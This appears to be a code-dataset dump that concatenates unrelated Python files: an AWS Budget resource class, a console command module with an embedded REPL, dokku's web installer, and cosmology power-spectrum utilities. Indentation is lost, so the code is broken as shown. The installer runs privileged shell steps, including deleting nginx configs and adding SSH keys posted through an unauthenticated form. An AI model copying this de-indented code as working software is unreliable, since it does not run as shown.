from attr import attrib
from attr import attrs
from ..core import ATTRSCONFIG
from ..core import Resource
from ..core import ResourceProperties
from ..core import create_object_converter
__all__ = ["Budget", "BudgetProperties"]
@attrs(**ATTRSCONFIG)
class BudgetProperties(ResourceProperties):
Budget = attrib(default=None)
NotificationsWithSubscribers = attrib(default=None)
@attrs(**ATTRSCONFIG)
class Budget(Resource):
"""A Budget for Budgets.
See Also:
`AWS Cloud Formation documentation for Budget
<http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-budgets-budget.html>`_
"""
RESOURCE_TYPE = "AWS::Budgets::Budget"
Properties: BudgetProperties = attrib(
factory=BudgetProperties, converter=create_object_converter(BudgetProperties)
)
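# Minimal usage sketch (hypothetical property values; the keys inside Budget
# follow the AWS::Budgets::Budget CloudFormation schema):
#   budget = Budget(Properties=BudgetProperties(
#       Budget={
#           "BudgetType": "COST",
#           "TimeUnit": "MONTHLY",
#           "BudgetLimit": {"Amount": 100, "Unit": "USD"},
#       },
#   ))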
|
lgpl-3.0
| -4,699,627,189,435,388,000
| 26.4
| 106
| 0.737226
| false
| 3.665552
| false
| false
| false
|
py-eww/eww
|
eww/command.py
|
1
|
15282
|
# -*- coding: utf-8 -*-
"""
eww.command
~~~~~~~~~~~
This is our custom command module. It is a subclass of
:py:class:`cmd.Cmd`. The most significant change is using classes rather
than functions for the commands.
Due to this change, we don't use CamelCase for command class names here.
Strictly that's ok via PEP8 since we are kinda treating these like
callables. Just a heads up.
"""
# PyLint picks up a lot of things here that it shouldn't. We clean up here.
# pylint: disable=too-few-public-methods, no-self-use, invalid-name
# pylint: disable=too-many-public-methods, redefined-outer-name
# pylint: disable=maybe-no-member, no-member, star-args, bad-builtin
import cmd
import code
import logging
from math import ceil
import os
import shlex
from StringIO import StringIO
import sys
import __builtin__
try:
import pygal
except ImportError: # pragma: no cover
# Just in case pygal isn't installed
pass
from .parser import Parser, ParserError, Opt
from .quitterproxy import safe_quit
from .shared import COUNTER_STORE, GRAPH_STORE
LOGGER = logging.getLogger(__name__)
class Command(cmd.Cmd):
"""Our cmd subclass where we implement all console functionality."""
class BaseCmd(object):
"""The base class for all commands."""
# You should define the following properties on all subclasses
name = 'Undefined'
description = 'Undefined'
usage = 'Undefined'
options = []
def run(self, line):
"""Performs the requested command. You should definitely override
this.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True to exit, None otherwise.
"""
pass
class EOF_command(BaseCmd):
"""Implements support for EOF being interpreted as an exit request."""
name = 'EOF'
description = 'An EOF will trigger this command and exit the console.'
usage = 'N/A'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class exit_command(BaseCmd):
"""Implements support for the 'exit' command to leave the console."""
name = 'exit'
description = 'Exits the console. (same as quit)'
usage = 'exit'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class quit_command(BaseCmd):
"""Implements support for the 'quit' command to leave the console."""
name = 'quit'
description = 'Quits the console. (same as exit)'
usage = 'quit'
def run(self, line):
"""Returns True to trigger an exit.
Args:
line (str): A command line argument to be parsed.
Returns:
bool: True
"""
return True
class repl_command(BaseCmd):
"""Drops the user into a python REPL."""
name = 'repl'
description = 'Provides an interactive REPL.'
usage = 'repl'
def register_quit(self):
"""Registers our custom quit function to prevent stdin from being
closed.
Returns:
None
"""
__builtin__.quit.register(safe_quit)
__builtin__.exit.register(safe_quit)
def unregister_quit(self):
"""Unregisters our custom quit function.
Returns:
None
"""
__builtin__.quit.unregister()
__builtin__.exit.unregister()
def run(self, line):
"""Implements the repl.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
print 'Dropping to REPL...'
repl = code.InteractiveConsole()
try:
self.register_quit()
banner = 'Python ' + sys.version + ' on ' + sys.platform + '\n'
banner += 'Note: This interpreter is running *inside* of your '
banner += 'application. Be careful.'
repl.interact(banner)
except SystemExit:
# This catches the exit or quit from the REPL.
pass
finally:
self.unregister_quit()
print "Exiting REPL..."
class stats_command(BaseCmd):
"""A command for inspecting stats and generating graphs."""
name = 'stats'
description = 'Outputs recorded stats and generates graphs.'
usage = 'stats [args] [stat_name]'
# Declare options
options = []
options.append(Opt('-g', '--graph',
dest='graph',
default=False,
action='store_true',
help='Create graph'))
options.append(Opt('-f', '--file',
dest='file',
default=False,
action='store',
type='string',
help='Filename to use when saving graph'))
options.append(Opt('-t', '--title',
dest='title',
default=False,
action='store',
type='string',
help='Graph title'))
def __init__(self):
"""Init."""
super(Command.stats_command, self).__init__()
self.parser = Parser()
self.parser.add_options(self.options)
# Pygal won't support more than this currently
self.max_points = 30
def display_stat_summary(self):
"""Prints a summary of collected stats.
Returns:
None
"""
if not COUNTER_STORE and not GRAPH_STORE:
print "No stats recorded."
return
if COUNTER_STORE:
print "Counters:"
for stat in COUNTER_STORE:
print " ", stat + ':' + str(COUNTER_STORE[stat])
if GRAPH_STORE:
print "Graphs:"
for stat in GRAPH_STORE:
print " ", stat + ':' + str(len(GRAPH_STORE[stat]))
def display_single_stat(self, stat_name):
"""Prints a specific stat.
Args:
stat_name (str): The stat name to display details of.
Returns:
None
"""
if stat_name in COUNTER_STORE:
print COUNTER_STORE[stat_name]
return
if stat_name in GRAPH_STORE:
print list(GRAPH_STORE[stat_name])
return
else:
print 'No stat recorded with that name.'
def reduce_data(self, data):
"""Shrinks len(data) to ``self.max_points``.
Args:
data (iterable): An iterable greater than ``self.max_points``.
Returns:
list: A list with a fair sampling of objects from ``data``,
and a length of ``self.max_points.``
"""
# Thanks to Adam Forsyth for this implementation
shrunk = []
size = float(len(data))
for num in range(self.max_points):
shrunk.append(data[int(ceil(num * size / self.max_points))])
return shrunk
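        # Worked example (illustrative): with max_points = 3, reduce_data on
        # [0, 1, 2, 3, 4, 5] picks indices ceil(0*6/3.)=0, ceil(1*6/3.)=2 and
        # ceil(2*6/3.)=4, returning [0, 2, 4].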
def generate_graph(self, options, stat_name):
"""Generate a graph of ``stat_name``.
Args:
options (dict): A dictionary of option values generated from
our parser.
stat_name (str): A graph name to create a graph from.
Returns:
None
"""
if stat_name not in GRAPH_STORE:
print 'No graph records exist for name', stat_name
return
if 'pygal' not in sys.modules: # pragma: no cover
print 'Pygal library unavailable. Try running `pip install',
print 'pygal`.'
return
data = list(GRAPH_STORE[stat_name])
graph = pygal.Line()
if options['title']:
graph.title = options['title']
else:
graph.title = stat_name
if len(data) > self.max_points:
data = self.reduce_data(data)
x_labels, y_labels = zip(*data)
graph.x_labels = map(str, x_labels)
graph.add(stat_name, y_labels)
graph_svg = graph.render()
filename = options['file'] or stat_name
filename += '.svg'
try:
with open(filename, 'w') as svg_file:
svg_file.write(graph_svg)
print 'Chart written to', filename # pragma: no cover
except IOError:
print 'Unable to write to', os.getcwd() + '/' + filename
def run(self, line):
"""Outputs recorded stats and generates graphs.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
if not line:
self.display_stat_summary()
return
try:
options, remainder = self.parser.parse_args(shlex.split(line))
except ParserError as error_msg:
print error_msg
return
options = vars(options)
if not remainder:
# User entered something goofy
help_cmd = Command.help_command()
help_cmd.display_command_detail('stats')
return
if options['graph']:
self.generate_graph(options, remainder[0])
return
else:
self.display_single_stat(remainder[0])
return
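        # Console usage sketch (illustrative names): `stats` prints the
        # summary, `stats mycounter` prints a single stat, and
        # `stats -g -t "Requests" mygraph` writes mygraph.svg.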
class help_command(BaseCmd):
"""When called with no arguments, this presents a friendly help page.
When called with an argument, it presents command specific help.
"""
name = 'help'
description = 'help provides in-console documentation.'
usage = 'help [command]'
# Declare options
options = []
def __init__(self):
"""Init."""
super(Command.help_command, self).__init__()
self.parser = Parser()
self.parser.add_options(self.options)
def get_commands(self):
"""Returns a list of command classes.
Returns:
list: A list of command classes (not instantiated).
"""
commands = []
blacklist = ['EOF_command']
# First we get a list of all command names
all_names = dir(Command)
# Then find on-topic names
for name in all_names:
if name.endswith('_command') and name not in blacklist:
# Pull names and descriptions
cls = getattr(Command, name)
commands.append(cls)
return commands
def display_commands(self):
"""Displays all included commands.
Returns:
None
"""
commands = self.get_commands()
print 'Available Commands:'
print ''
for command in commands:
print ' ', command.name, '-', command.description
print ''
print 'For more info on a specific command, enter "help <command>"'
def display_command_detail(self, command_name):
"""Displays detailed command help.
Args:
command_name (str): A command name to print detailed help for.
Returns:
None
"""
name = command_name + '_command'
try:
cls = getattr(Command, name)
except AttributeError:
print command_name, 'is not a valid command.'
return
print 'Usage:'
print ' ', cls.usage
print ''
print 'Description:'
print ' ', cls.description
if not cls.options:
# All done
return
else:
print ''
# There are a lot of edge cases around pretty printing options.
# This is not elegant, but it's the least brittle option.
output = StringIO()
parser = Parser()
parser.add_options(cls.options)
parser.print_help(file=output)
output = output.getvalue()
# Massage output
output = output.split('\n')
# Remove trailing newline
output = output[:-1]
# Print everything after Options
start = output.index('Options:')
for line in output[start:]:
print line
def run(self, line):
"""Provides help documentation.
Args:
line (str): A command line argument to be parsed.
Returns:
None
"""
if not line:
self.display_commands()
return
try:
options, remainder = self.parser.parse_args(shlex.split(line))
del options # To shutup pylint
except ParserError as error_msg:
print error_msg
return
self.display_command_detail(remainder[0])
def onecmd(self, line):
"""We override cmd.Cmd.onecmd in order to support our class-based
commands. Changes are noted via comments.
Args:
line (str): A command (with arguments) to be executed.
Returns:
bool: True if a command is designed to exit, otherwise None.
"""
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if line == 'EOF':
self.lastcmd = ''
if cmd == '':
return self.default(line)
else:
try:
# Changes start
cmd_class = getattr(Command, cmd + '_command')
cmd_class = cmd_class()
# Changes end
except AttributeError:
return self.default(line)
# Changes start
return cmd_class.run(arg)
# Changes end
def default(self, line):
"""The first responder when a command is unrecognized."""
print 'Command unrecognized.'
|
mit
| 357,748,505,772,380,400
| 28.501931
| 79
| 0.499018
| false
| 4.936047
| false
| false
| false
|
alessio/dokku
|
contrib/dokku-installer.py
|
1
|
7718
|
#!/usr/bin/env python2.7
import cgi
import json
import os
import SimpleHTTPServer
import SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.4.11'
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = subprocess.check_output(command, shell=True)
if ':' in hostname:
hostname = ''
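    # i.e. prefer $HOSTNAME when it resolves in DNS, otherwise fall back to
    # the public IP reported by icanhazip.com; colon-containing (IPv6-looking)
    # results are discarded above.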
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', '/root/.ssh/authorized_keys')
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = subprocess.check_output(command, shell=True).strip().split("\n")
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_dir = os.getenv('NGINX_DIR', '/etc/nginx/conf.d')
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_dir):
with open('{0}/dokku-installer.conf'.format(nginx_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f /etc/nginx/sites-enabled/*', shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.wfile.write(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
if 'vhost' in params and params['vhost'].value == 'true':
with open('{0}/VHOST'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
else:
try:
os.remove('{0}/VHOST'.format(dokku_root))
except OSError:
pass
with open('{0}/HOSTNAME'.format(dokku_root), 'w') as f:
f.write(params['hostname'].value)
command = ['sshcommand', 'acl-add', 'dokku', 'admin']
for key in params['keys'].value.split("\n"):
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
proc.stdin.write(key)
proc.stdin.close()
proc.wait()
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
self.send_response(200)
self.end_headers()
self.wfile.write(json.dumps({'status': 'ok'}))
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm /etc/nginx/conf.d/dokku-installer.conf && /etc/init.d/nginx stop && /etc/init.d/nginx start"
try:
subprocess.call(command, shell=True)
        except Exception:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && stop dokku-installer"
try:
subprocess.call(command, shell=True)
        except Exception:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print "Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port)
httpd.serve_forever()
PAGE = """
<html>
<head>
<title>Dokku Setup</title>
<link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<div class="container" style="width: 640px;">
<form id="form" role="form">
<h1>Dokku Setup <small>{VERSION}</small></h1>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Admin Access</small></h3>
<label for="key">Public Key</label><br />
<textarea class="form-control" name="keys" rows="7" id="key">{ADMIN_KEYS}</textarea>
</div>
<div class="form-group">
<h3><small style="text-transform: uppercase;">Hostname Configuration</small></h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" />
</div>
<div class="checkbox">
<label><input id="vhost" name="vhost" type="checkbox" value="true"> Use <abbr title="Nginx will be run on port 80 and backend to your apps based on hostname">virtualhost naming</abbr> for apps</label>
</div>
<p>Your app URLs will look like:</p>
<pre id="example">http://hostname:port</pre>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span style="padding-left: 20px;" id="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
function setup() {
if ($.trim($("#key").val()) == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($.trim($("#hostname").val()) == "") {
alert("Your hostname cannot be blank.")
return
}
data = $("#form").serialize()
$("input,textarea,button").prop("disabled", true);
$.post('/setup', data)
.done(function() {
$("#result").html("Success!")
window.location.href = "http://progrium.viewdocs.io/dokku/application-deployment";
})
.fail(function(data) {
$("#result").html("Something went wrong...")
$("#error-output").html(data.responseText)
});
}
function update() {
if ($("#vhost").is(":checked") && $("#hostname").val().match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").prop('checked', false);
}
if ($("#vhost").is(':checked')) {
$("#example").html("http://<app-name>."+$("#hostname").val())
} else {
$("#example").html("http://"+$("#hostname").val()+":<app-port>")
}
}
$("#vhost").change(update);
$("#hostname").change(update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
mit
| 5,662,286,861,856,601,000
| 34.081818
| 208
| 0.564006
| false
| 3.497055
| false
| false
| false
|
rbiswas4/FluctuationsInCosmology
|
interfacecosmology/psutils.py
|
1
|
25544
|
#!/usr/bin/env python
#
#This is a set of wrappers designed to use methods of obtaining linear
#quantities of interest from outputs of actual programs that do the
#calculations, like CAMB with the help of utilities for specific programs.
#
#USEFUL ROUTINES:
#
#powerspectrum: obtains the linear power spectrum of various quantities from
#---------------
# standard outputs of programs like CAMB
#sigma
#---------------
#sigmaM
#--------------
#CHANGES:
#Only assign values to cosmo as default if values from cosmo are being used
#otherwise pass as whole
#
#Fixed the spelling of filterradiusformass and its calls. Checked that the
#tests at the bottom of the file still work.
#R. Biswas, Thu Nov 14 15:31:46 CST 2013
#
#Fixed bug in function sigmaM, where filterradius is called without
#optional argument cosmo and z. The same bug was there in sigmaM (where
#it was being called without z, and derivatives of sigma and the mass
# function calculation.
#R. Biswas, Thu Nov 14 17:59:14 CST 2013
import sys
import matplotlib.pyplot as plt
import utils.typeutils as tu
import massfunctions as mf
import growthfunction
import numpy as np
import camb_utils.cambio as cio
import utils.filters as filters
verbose = False
def loginterp(xreq, xnative, ynative , left = np.nan , right = np.nan):
        logxreq = np.log(xreq)
        npinterp = np.interp(logxreq , np.log(xnative), np.log(ynative))
        res = np.exp(npinterp)
        # honor the left / right fill values outside the tabulated range
        res = np.where(xreq < xnative[0], left, res)
        return np.where(xreq > xnative[-1], right, res)
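# Example (illustrative): power-law data is interpolated exactly in log space,
# e.g. loginterp(np.array([2.]), np.array([1., 4.]), np.array([1., 16.]))
# returns array([ 4.]), since y = x**2 is a straight line in log-log.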
def critdensity(h = 1.0,
unittype = 'kgperm3') :
"""Returns the critical density today $\Omega_{crit}(z=0) as a
function of h through the formula
$10^4 h^2 (3.0/(8.0 \pi G) )) in units of kg /m^3 or solar
masses / Mpc^3 .
args:
h: float, optional, defaults to 1.0
= H0/100
unittype: string ,optional, defaults to SI
kgperm3: SI units
solarmassperMpc3: units of M_{\sun} / Mpc^3
returns:
critical density. If no argument is supplied the correct
critical density is the return times h^2
example usage:
>>> from astropy.cosmology import Planck13 as cosmo
>>> print critdensity (cosmo.h )
>>> print cosmo.critical_density0
>>> #The two above values should be same to unit definition
status:
Tested with above tests and found to work. The value of 10^{-27}
is due to the difference in units with astropy.
R. Biswas, Sun Aug 18 12:41:42 CDT 2013
                BUGFIX: unittype ought to be kgperm3 in the if loop, but
                was written as kmperm3. Fixed typo.
R. Biswas, Wed Nov 13 19:22:28 CST 2013
notes :
The answer is ~ 10^{-27} while the answer in gm/cm^3 is
~10^{-30} as quoted in PDG for example.
TODO: This function will be removed to cosmodefs
"""
from astropy import units as u
from astropy import constants as ct
kmperMpc = (u.km / u.Mpc).decompose().scale
H0 = 100.0 * kmperMpc *h # in units of per sec
rhocrit = H0*H0 * 3.0 /(8.0 * np.pi * ct.G.value)
#Multiply mass in kg by convtosolmass to get mass in solar mass
convtosolmass = u.kg.to(u.solMass)
#Multiply distance in m to distance in Mpc
convtoMpc = (u.m.to(u.Mpc))
if unittype == "kgperm3" :
rhocritu = rhocrit
if unittype == "solarmassperMpc3":
rhocritu = rhocrit*convtosolmass/convtoMpc**3.0
return rhocritu
def __rhobg ( z = 0.0 , bgtype = "cb", unittype = "solarmassperMpc3",
cosmo = None):
"""returns the background density at redshift z. If bgtype = "matter"
        then the function returns the background matter (CDM + baryon + massive
neutrino) density.
args:
z:
optional, float , defaults to 0.
redshift at which the background density is
calculated
bgtype :
                        string, optional, defaults to "cb"
                        choices: "matter"
                                "cb" : baryon + CDM
unittype :
string, optional ,defaults to "Msun/Mpc3"
defines the unit of the return
solarmassperMpc3:
Units of solar mass per Mpc cube
SI :
cosmo : w0wa cosmology
returns:
float, the background density in units of type unittype
example usage:
status:
notes:
Will change later. This exists because our definition of
matter includes neutrinos, which I want to remove later
so that matter is baryon CDM by definition.
Remove to cosmodefs.
"""
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
if bgtype == "matter":
Om0 = cosmo.Om0
if bgtype == "cb":
Om0 = cosmo.Ob0 + cosmo.Oc0
h = cosmo.H0 /100.
rho = critdensity(h = h, unittype = 'solarmassperMpc3')*Om0*(1.+z)**3.0
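        # Worked example (illustrative): rhocrit ~ 2.775e11 h^2 Msun/Mpc^3,
        # so h = 0.7 and Om0 = 0.3 give rho ~ 4.1e10 Msun/Mpc^3 at z = 0.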
return rho
def filterradiusformass( M ,
z = 0. ,
bgtype = "cb" ,
cosmo = None):
"""
returns a radius in units of Mpc which encloses a mass M of the
        homogeneous density of particles specified as bgtype at the redshift
z for a cosmology cosmo.
args:
M :
mass in solar masses
z : float, defaults to 0.
redshift
                bgtype : string, defaults to "cb"
background density to use in converting
mass to a radius
                cosmo : w0wa cosmology object; must be supplied
returns :
Radius in Mpc
"""
#if cosmo == None:
# from astropy.cosmology import Planck13 as cosmo
rhobg = __rhobg ( z , bgtype = bgtype, unittype = "solarmassperMpc3", cosmo = cosmo)
#Assume mass is made of all matter
Rcube = 3* M / rhobg /4.0 / np.pi
R = np.power (Rcube, 1.0/3.0)
return R
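# Usage sketch (hypothetical numbers; cosmo is any object exposing Ob0, Oc0
# and H0): filterradiusformass(1e15, z=0., bgtype="cb", cosmo=cosmo) returns
# R = (3 M / (4 pi rho_bg))**(1/3) in Mpc, of order ~10 Mpc for cluster masses.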
def powerspectrumfromfile(fname,
koverh = None ,
pstype = "matter" ,
h = 0.71 ,
ns = 0.963 ,
As = 2.1e-9 ,
Omegacdm = None ,
Omegab = None ):
"""
****************************************
DEPRECATED: USE cambio functions instead
*****************************************
returns a tuple of koverh values and the interpolated power
        spectra at these values of koverh using a CAMB output which
may be a power spectrum output or transfer function output.
If the output is a transfer function output, then ns, h,
and As must be supplied
args:
returns:
tuple of (koverh, ps values)
"""
#decide if file is transfer function or Power spectrum output
psfile = False
tffile = False
Unknown = True
tmpfile = np.loadtxt(fname)
shapetuple = np.shape(tmpfile)
if shapetuple[-1] == 7:
tffile = True
Unknown = False
if shapetuple[-1] ==2 :
psfile = True
Unknown = False
if koverh == None:
koverh = tmpfile[:,0]
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
if psfile :
if pstype != "matter" :
raise ValueError ("Cannot obtain non-matter power spectrum from CAMB power spectrum file")
return (koverh , powerspectrum(koverh, fname ) )
if tffile :
if pstype == "matter" :
transfer = cio.loadtransfers(rootname = None,
filename = fname)
ps = cio.matterpowerfromtransfersforsinglespecies( koverh ,
transfer ,
h ,
As ,
ns )
return (ps [:,0], ps[:,1])
elif pstype == "cb" :
#LOST CODE HERE
return 0
def powerspectrum ( koverh ,
asciifile = None ,
pstype = "matter",
sigma8type = "matter" ,
method = "CAMBoutfile",
z = 0.0 ,
cosmo = None ,
interpmethod = 'log' ,
**params):
"""
returns linearly interpolated values of the powerspectrum in the
powerspectrumfile with k values in units of h/Mpc. Using
this with koverh = None, returns the values in the table.
args:
koverh : array-like of floats or Nonetype, mandatory
k in units of h/Mpc
asciifile: string,
Filename for power spectrum or CAMB transfer function.
power sepctrum or transfer function input will be
recognized from CAMB file structure.
cosmo : interfacecosmology/astropy cosmological model
method : string, optional , defaults to "CAMBoutfile"
Method of obtaining power spectrum with fixed options
options:
-------
CAMBoutfile :assume that the asciifile output of CAMB
is at desired redshift
CAMBoutgrowth :Use the asciifile from CAMB output at
z = 0.0 , and use a growth function to find
the power spectrum at z = z
interpmethod: string, optional, defaults to 'log'
options:
'log': linearly interpolates
log(koverh) vs log(PS) in units of h^#/Mpc^3
'linear' : linearly interpolates koverh and PS
pstype : string, optional, defaults to 'matter'
sets the way the perturbations are counted in order
to calculate the matter power spectrum, though the perturbations are evolved correctly according to the
cosmological model.
OPTIONS:
--------
'matter': Conventional matter power spectrum, as would
be calculated in CAMB, including the density
contrast for CDM, baryon and massive neutrinos
'cb' : Counts only the cDM and baryons in calculating
the matter power spectrum.
'cbmatter': Counts only the CDM and baryon fluctuations
but the entire matter (CDM + baryons + massive
neutrinos) for the background density
returns:
tuple (koverh , power spectrum)
    notes: support for additional methods of obtaining the power
        spectrum may be added over time
Override Rules:
sigma8 overrides As
params dictionary overrides cosmo
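    usage:
        (illustrative sketch; "LCDM_matterpower.dat" stands in for any
         CAMB matter power spectrum output at the desired redshift)
        >>> kh, ps = powerspectrum(koverh=None,
        ...                        asciifile="LCDM_matterpower.dat",
        ...                        method="CAMBoutfile")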
"""
#Make sure evaluation method is implemented
if not method in ["CAMBoutfile","CAMBoutgrowth"]:
raise ValueError("Method not defined")
if method in ["CAMBoutfile", "CAMBoutgrowth"] :
#Query CAMB file type: power spectrum or transfer
psfile, tkfile, Unknown = cambasciifiletype (asciifile)
if method == "CAMBoutgrowth":
#cannot calculate growth if cosmo not provided
        if cosmo is None and z > 0.000001:
            raise ValueError("Method does not work if cosmo is not defined")
        Dg = 1.0
        if cosmo is not None:
            if z > 0.000001:
                Dg = cosmo.growth(z)[0]
# decide whether As or sigma8 is to be used
# if sigma8 provided use it, otherwise As
sigma8 = None
As = None
    # params is a plain dict; the original used attribute access
    # (params.sigma8) and nested the As lookup under the sigma8 key
    if params.has_key("sigma8") and params["sigma8"] is not None:
        sigma8 = params["sigma8"]
    if params.has_key("As") and params["As"] is not None:
        As = params["As"]
    if cosmo is not None:
        if cosmo.sigma8 is not None and sigma8 is None:
            sigma8 = cosmo.sigma8
        if cosmo.As is not None and As is None:
            As = cosmo.As
    #If neither As nor sigma8 is provided, fail!
    if As is None and sigma8 is None and not psfile:
        raise ValueError("without As or sigma8 provided, matter power spectrum cannot be calculated from transfer functions\n")
    if sigma8 is not None:
        As = 1.0
    # params comes in as **kwargs, so it is always a dict (possibly empty)
    paramdict = dict(params)
    paramdict["As"] = As
#print "VALUES passed on from powerspectrum routine \n"
    if verbose:
        # print the resolved local As (cosmo may legitimately be None here)
        print "sigma8 = ", sigma8, " As = ", As
#print paramdict["As"], "IN powerspectrum"
pstmp = __powerspectrum ( koverh = None,
asciifile = asciifile ,
pstype = pstype ,
method = method ,
z = z ,
cosmo = cosmo ,
**paramdict )
#If sigma8 is given, we need to normalize power spectrum
#power spectrum to normalize is pssigma8
if sigma8 != None:
if pstype !=sigma8type:
if verbose:
print "evaluate sigmatype ps \n"
pssigma8 = __powerspectrum ( koverh = None,
asciifile = asciifile ,
pstype = sigma8type ,
method = method ,
z = z ,
cosmo = cosmo ,
**paramdict)
else:
pssigma8 = pstmp
if sigma8 != None :
Asrel = getAsrel (pssigma8 , sigma8, cosmo = cosmo,
filt= filters.Wtophatkspacesq, **paramdict)
#print "Now As has been determined to be ", sigma8type , Asrel
v = pstmp[0], Asrel*pstmp[1]
else :
v = pstmp
    if koverh is not None:
if interpmethod == "linear":
ret = koverh, np.interp(koverh, v[0], v[1],
left = np.nan , right = np.nan)
else:
interpmethod = "log"
ret = koverh, loginterp(koverh, v[0], v[1],
left = np.nan , right = np.nan)
else:
ret = v
if method == "CAMBoutgrowth" :
return ret[0],Dg*Dg*ret[1]
else:
return ret
def getvalsfromparams(cosmo, **params):
"""
TO DO
provide a general function to pass values into cosmo and params
"""
return None
def cambasciifiletype( fname ) :
    # Decide whether this is a matter or transfer file
psfile = False
tkfile = False
Unknown = True
tmpfile = np.loadtxt(fname )
shapetuple = np.shape(tmpfile)
if shapetuple[-1] == 7:
tkfile = True
Unknown = False
if shapetuple[-1] ==2 :
psfile = True
Unknown = False
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
return psfile, tkfile, Unknown
def __powerspectrum ( koverh ,
asciifile = None ,
pstype = "matter",
method = "CAMBoutfile",
z = 0.0 ,
cosmo = None ,
**params):
"""
DO NOT CALL DIRECTLY. CALL powerspectrum instead
returns linearly interpolated values of the powerspectrum in the
powerspectrumfile with k values in units of h/Mpc. Using
this with koverh = None, returns the values in the table.
args:
koverh : array-like of floats or Nonetype, mandatory
k in units of h/Mpc
asciifile: string,
Filename for power spectrum or CAMB transfer function.
            power spectrum or transfer function input will be
recognized from CAMB file structure.
method : string, optional , defaults to "CAMBoutfile"
Method of obtaining power spectrum with fixed options
options:
-------
CAMBoutfile :assume that the asciifile output of CAMB
is at desired redshift
CAMBoutgrowth :Use the asciifile from CAMB output at
z = 0.0 , and use a growth function to find
the power spectrum at z = z
returns:
tuple (koverh , power spectrum)
    notes: support for additional methods of obtaining the power
        spectrum may be added over time
"""
#ensure we are supposed to read CAMB outfiles
if not method in ["CAMBoutfile","CAMBoutgrowth"]:
raise ValueError("Method not defined")
    # (file-type detection was factored out into cambasciifiletype above;
    # the old inline version has been removed)
psfile, tkfile, Unknown = cambasciifiletype ( asciifile )
tmpfile = np.loadtxt(asciifile)
    if koverh is None:
koverh = tmpfile[:,0]
if Unknown:
#file is not CAMB transfer function or power spectrum output
raise ValueError("Unknown filename supplied")
if psfile:
pk = cio.loadpowerspectrum(asciifile)
if not np.all(np.diff(pk[:,0])>0.):
raise ValueError("The k values in the power spectrum file are not in ascending order")
        if koverh is None:
return (pk[:,0], pk[:,1])
return koverh, np.interp( koverh, pk[:,0],pk[:,1],left = np.nan, right = np.nan)
if tkfile:
#print "AS " , params["As"]
#print cosmo.Ob0, cosmo.Oc0
if pstype == "cb":
#print "filename ", asciifile
pk = cio.cbpowerspectrum ( transferfile = asciifile ,
Omegacdm = cosmo.Oc0,
Omegab = cosmo.Ob0,
h = cosmo.h,
Omeganu = cosmo.On0,
As = params["As"],
#As = cosmo.As,
ns = cosmo.ns,
koverh = None )
return (pk [:,0], pk[:,1])
